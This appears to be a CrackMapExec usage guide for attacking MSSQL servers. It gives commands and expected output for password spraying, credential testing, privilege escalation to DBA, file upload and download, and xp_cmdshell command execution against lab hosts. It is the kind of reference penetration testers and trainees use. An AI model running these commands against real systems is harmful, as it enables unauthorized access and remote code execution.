Password spraying
Password spraying (without bruteforce)

cme mssql 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce

Expected Results:
MSSQL       10.10.10.x     1433   None             [-] ERROR(TALLY): Line 1: Login failed for user 'test1'.
MSSQL       10.10.10.x     1433   None             [+] sa:password (Pwn3d!)
By default CME will exit after a successful login is found. Using the --continue-on-success flag will continue spraying even after a valid password is found. Usefull for spraying a single password against a large user list.

Authentication
Testing credentials
You can use two methods to authenticate to the MSSQL: windows or local (default: windows). To use local auth, add the following flag --local-auth
Windows auth
    With SMB port open

cme mssql 10.10.10.x -u james -p 'J@m3s_P@ssW0rd!'

    With SMB port close, add the flag -d DOMAIN
cme mssql 10.10.10.x -u james -p 'J@m3s_P@ssW0rd!' -d HTB

Expected Results:
MSSQL       10.10.10.x     1433   MANTIS           [+] HTB\james:J@m3s_P@ssW0rd! 

Local auth
cme mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --local-auth
Expected Results:
MSSQL       10.10.10.x     1433   None             [+] admin:m$$ql_S@_P@ssW0rd! (Pwn3d!)

Specify Ports
cme mssql 10.10.10.x -u admin -p 'm$$ql_S@_P@ssW0rd!' --port 1434

MSSQL Privesc
Module to privesc from standard user to DBA
cme mssql <ip> -u user -p password -M mssql_priv

MSSQL upload/download
Download / Upload MSSQL file
cme mssql 10.10.10.x -u admin -p 'm$$ql_S@_P@ssW0rd!' --put-file  --put-file /tmp/users C:\\Windows\\Temp\\whoami.txt

Expected Results:
$ poetry run crackmapexec mssql 192.168.212.x -u administrator -p October2022 --put-file /tmp/users C:\\Windows\\Temp\\whoami.txt
MSSQL       192.168.212.x 1433   DC01             [*] Windows 10.0 Build 20348 (name:DC01) (domain:poudlard.wizard)
MSSQL       192.168.212.x 1433   DC01             [+] poudlard.wizard\administrator:October2022 (Pwn3d!)
MSSQL       192.168.212.x 1433   DC01             [*] Copy /tmp/users to C:\Windows\Temp\whoami.txt
MSSQL       192.168.212.x 1433   DC01             [*] Size is 23 bytes
MSSQL       192.168.212.x 1433   DC01             [+] File has been uploaded on the remote machine
cme mssql 10.10.10.x -u admin -p 'm$$ql_S@_P@ssW0rd!' --get-file C:\\Windows\\Temp\\whoami.txt /tmp/file
Expected Results:
$ poetry run crackmapexec mssql 192.168.212.x -u administrator -p October2022 --get-file C:\\Windows\\Temp\\whoami.txt /tmp/users-t
MSSQL       192.168.212.x 1433   DC01             [*] Windows 10.0 Build 20348 (name:DC01) (domain:poudlard.wizard)
MSSQL       192.168.212.x 1433   DC01             [+] poudlard.wizard\administrator:October2022 (Pwn3d!)
MSSQL       192.168.212.x 1433   DC01             [*] Copy C:\Windows\Temp\whoami.txt to /tmp/users-t
MSSQL       192.168.212.x 1433   DC01             [+] File C:\Windows\Temp\whoami.t

Execute Windows Command
This option use xp_cmdshell to exec command on the remote host.

cme mssql 10.10.10.x -u sa -p 'GWE3V65#6KFH93@4GWTG2G' --local-auth -x whoami
MSSQL       10.10.10.x     1433   None             [+] sa:GWE3V65#6KFH93@4GWTG2G (Pwn3d!)
MSSQL       10.10.10.x     1433   None             [+] Executed command via mssqlexec
MSSQL       10.10.10.x     1433   None             --------------------------------------------------------------------------------
MSSQL       10.10.10.x     1433   None             tally\sarah















